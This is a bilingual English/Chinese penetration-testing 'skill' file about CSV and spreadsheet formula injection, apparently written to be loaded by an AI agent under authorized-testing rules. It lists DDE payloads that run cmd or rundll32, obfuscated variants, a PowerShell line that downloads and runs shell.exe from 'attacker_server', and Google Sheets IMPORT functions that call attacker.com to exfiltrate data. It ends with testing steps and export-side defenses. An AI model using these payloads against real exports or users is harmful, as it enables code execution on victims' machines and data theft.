csv-formula-injection
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: CSV Formula Injection
SKILL: CSV Formula Injection
AI LOAD INSTRUCTION: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where explicitly authorized; payloads that invoke local commands or remote fetches are impactful—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests.
AI加载说明: 本技能覆盖CSV和电子表格场景下的公式/DDE类型注入、混淆方法、云表格原语,以及安全测试方法论。仅在明确授权的情况下使用;调用本地命令或远程获取内容的payload影响范围大——优先选择实验室目标并留存同意文档。在测试规则未允许客户端执行测试的情况下,禁止针对终端用户发起测试。
0. QUICK START
0. 快速开始
Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula):
text
=
+
-
@Test cells may look like:
csv
name,value
test,=1+1
test,+1+1
test,-1+1
test,@SUM(1+1)中文路由提示:导出 CSV、后台报表、用户资料进表格时优先测这些前缀字符。
当单元格在Excel、LibreOffice Calc或同类软件中打开时,可能触发公式计算的字符(通常仅当单元格被识别为公式时生效):
text
=
+
-
@测试单元格示例如下:
csv
name,value
test,=1+1
test,+1+1
test,-1+1
test,@SUM(1+1)中文路由提示:导出 CSV、后台报表、用户资料进表格时优先测这些前缀字符。
1. DDE INJECTION (EXCEL / LIBREOFFICE)
1. DDE注入(EXCEL / LIBREOFFICE)
Dynamic Data Exchange (DDE) and external call patterns historically abused in spreadsheets. Examples for controlled lab reproduction:
text
DDE("cmd";"/C calc";"!A0")A0text
@SUM(1+1)*cmd|' /C calc'!A0text
=2+5+cmd|' /C calc'!A0text
=cmd|' /C calc'!'A1'PowerShell-style chaining (lab only; replace host and payload with benign equivalents):
text
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0动态数据交换(DDE)和外部调用模式是历来电子表格中被滥用的点。以下示例仅用于受控实验室复现:
text
DDE("cmd";"/C calc";"!A0")A0text
@SUM(1+1)*cmd|' /C calc'!A0text
=2+5+cmd|' /C calc'!A0text
=cmd|' /C calc'!'A1'PowerShell风格链式调用(仅实验室使用;将主机和payload替换为无害等价内容):
text
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A02. OBFUSCATION
2. 混淆方法
Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed):
text
AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!AExtra whitespace after :
=text
= cmd|'/c calc.exe'!ADispersed characters / unusual spacing (conceptual pattern—adjust per parser):
text
= C m D |'/c calc.exe'!Arundll32text
=rundll32|'URL.dll,OpenURL calc.exe'!A防御侧的解析器可能会清除明显的攻击特征,测试人员可以尝试添加干扰字符和空格(仍仅在允许的范围内使用):
text
AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A=text
= cmd|'/c calc.exe'!A字符分散/非常规空格(概念性模式——根据解析器调整):
text
= C m D |'/c calc.exe'!Arundll32text
=rundll32|'URL.dll,OpenURL calc.exe'!A3. GOOGLE SHEETS
3. GOOGLE SHEETS 场景
If exported data is later opened in Google Sheets, or sheets pull from untrusted CSV, these functions can cause outbound requests or cross-document data pulls:
Data exfiltration / probe (replace URL with your authorized callback):
text
=IMPORTXML("http://attacker.com/", "//a/@href")Other high-risk imports:
text
=IMPORTRANGE("spreadsheet_url", "range")
=IMPORTHTML("http://attacker.com/table", "table", 1)
=IMPORTFEED("http://attacker.com/feed.xml")
=IMPORTDATA("http://attacker.com/data.csv")Document which function executed and what network side effects occurred.
如果导出的数据后续会在Google Sheets中打开,或表格从不受信任的CSV拉取数据,以下函数可能会引发出站请求或跨文档数据拉取:
数据外泄/探测(将URL替换为你授权的回调地址):
text
=IMPORTXML("http://attacker.com/", "//a/@href")其他高风险导入函数:
text
=IMPORTRANGE("spreadsheet_url", "range")
=IMPORTHTML("http://attacker.com/table", "table", 1)
=IMPORTFEED("http://attacker.com/feed.xml")
=IMPORTDATA("http://attacker.com/data.csv")记录执行的函数名称,以及产生的网络副作用。
4. TESTING METHODOLOGY
4. 测试方法论
- Map sinks — Any feature that emits CSV, XLSX, or tab-separated output: admin exports, audit logs, user rosters, billing reports, search results.
- Trace user-controlled fields — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input.
- Inject formula prefixes — Start with benign arithmetic (,
=1+1) to detect evaluation; escalate only per rules.+1+1 - Open in target software — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators.
- Evidence — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version.
中文:重点找「用户输入 → 导出 → 用表格软件打开」的链路。
- 梳理Sink点 —— 任何输出CSV、XLSX或制表符分隔内容的功能:后台导出、审计日志、用户名单、账单报表、搜索结果。
- 追踪用户可控字段 —— 资料字段、工单标题、交易备注、标签、ZIP导出中的文件名——任何会回显存储的输入内容的列。
- 注入公式前缀 —— 从无害的算术运算(、
=1+1)开始检测是否存在公式计算;仅按照规则升级测试力度。+1+1 - 在目标软件中打开验证 —— 匹配受害者的工作流:桌面版Excel、LibreOffice、Google Sheets导入、区域特定的小数分隔符。
- 留存证据 —— 截图/记录单元格显示的是计算结果、安全警告还是DDE弹窗;备注产品版本。
中文:重点找「用户输入 → 导出 → 用表格软件打开」的链路。
5. DEFENSE
5. 防御方案
Application and export-layer mitigations:
- Prefix with single quote — In many spreadsheet apps, leading forces text interpretation:
'displays literally.'=cmd|... - Prefix with tab — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly.
- Strip or neutralize leading triggers — Remove or escape leading ,
=,+,-(and Unicode lookalikes) at export time.@ - CSV encoding — Use consistent quoting; validate column types; avoid passing raw formula strings into financial/reporting templates without sanitization.
- User education — Do not enable external data / DDE without policy.
Example safe export transformation (conceptual):
text
Input: =1+1
Output: '=1+1 OR \t=1+1 OR (empty prefix) with escaped quotes per RFC 4180中文:与业务导出、报表、API 导出参数联动分析时可结合 injection、business-logic、API 安全相关技能。
应用层和导出层的缓解措施:
- 添加单引号前缀 —— 在多数电子表格软件中,开头的会强制按文本解析:
'会原样显示。'=cmd|... - 添加制表符前缀 —— 部分处理流程在正确解析时,会将制表符开头的字段视为非公式文本。
- 清除或中和开头的触发字符 —— 导出时移除或转义开头的、
=、+、-(以及对应的Unicode相似字符)。@ - CSV编码规范 —— 使用统一的引号规则;校验列类型;未经消毒的原始公式字符串禁止传入财务/报表模板。
- 用户教育 —— 没有政策允许的情况下不要启用外部数据/DDE功能。
安全导出转换示例(概念性):
text
Input: =1+1
Output: '=1+1 OR \t=1+1 OR (empty prefix) with escaped quotes per RFC 4180中文:与业务导出、报表、API 导出参数联动分析时可结合 injection、business-logic、API 安全相关技能。